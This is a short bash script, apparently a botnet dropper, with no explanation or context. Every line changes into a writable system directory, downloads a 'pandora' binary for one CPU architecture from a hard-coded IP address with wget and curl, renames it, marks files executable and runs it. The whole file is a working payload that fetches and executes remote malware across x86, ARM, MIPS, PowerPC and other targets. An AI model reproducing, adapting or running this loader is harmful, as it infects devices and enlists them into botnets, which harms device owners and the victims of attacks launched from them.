#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.x86; curl -O http://107.174.176.165/Pandoras_Box/pandora.x86;cat pandora.x86 >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.mips; curl -O http://107.174.176.165/Pandoras_Box/pandora.mips;cat pandora.mips >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.mpsl; curl -O http://107.174.176.165/Pandoras_Box/pandora.mpsl;cat pandora.mpsl >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.arm4; curl -O http://107.174.176.165/Pandoras_Box/pandora.arm4;cat pandora.arm4 >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.arm5; curl -O http://107.174.176.165/Pandoras_Box/pandora.arm5;cat pandora.arm5 >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.arm6; curl -O http://107.174.176.165/Pandoras_Box/pandora.arm6;cat pandora.arm6 >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.arm7; curl -O http://107.174.176.165/Pandoras_Box/pandora.arm7;cat pandora.arm7 >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.ppc; curl -O http://107.174.176.165/Pandoras_Box/pandora.ppc;cat pandora.ppc >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.m68k; curl -O http://107.174.176.165/Pandoras_Box/pandora.m68k;cat pandora.m68k >awoo;chmod +x *;./awoo
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.176.165/Pandoras_Box/pandora.sh4; curl -O http://107.174.176.165/Pandoras_Box/pandora.sh4;cat pandora.sh4 >awoo;chmod +x *;./awoo
